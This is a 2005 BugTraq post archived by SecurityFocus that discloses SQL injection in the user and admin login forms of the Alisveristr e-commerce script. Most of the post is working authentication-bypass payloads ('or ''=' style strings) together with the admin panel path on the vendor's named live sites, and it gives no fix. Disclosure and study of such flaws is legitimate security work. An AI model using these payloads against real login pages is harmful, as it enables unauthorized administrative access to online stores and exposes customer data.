BugTraq
Alisveristr E-Commerce Admin Login SQL İnjection Dec 03 2005 12:53AM
B3g0k hackermail com
###Hi all
###B3g0k[at]hackermail.com
###Kurdish Hacker
###Special Thanx All Kurdish Hackers
###Freedom For Ocalan!!!
###-----------------------------------
###Alisveristr E-commerce User Login Sql İnjection
###Alisveristr E-commerce Admin Login Sql ###İnjection
###-----------------------------------
###Site: http://www.alisveristr.com or ###http://www.alisveris-tr.com
###
###Description: A E-Commerce scirpt it is too ###cool... :)
User login Sql İnjection:

Code 1 For User Login :

Username : ' or ''='
Password: ' or ''='

Another User Login Sql İnjecition

Username : ' or 'a'='a
Password : ' or 'a'='a

----------------------------------

Now Admin login Sql injectoin
ex: http://site.com/yonetim/default.asp
http://www.alisveristr.com/yonetim
http://www.alisveris-tr.com/yonetim

Code 1 For Admin Login
Username : ' or ''='
Password : ' or ''='

Code 2 For Admin Login :
Username : ' or 'a'='a
Password : ' or 'a'='a

Thats it.
Contact : B3g0k (at) hackermail (dot) com [email concealed]
Kurdish Hacker

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus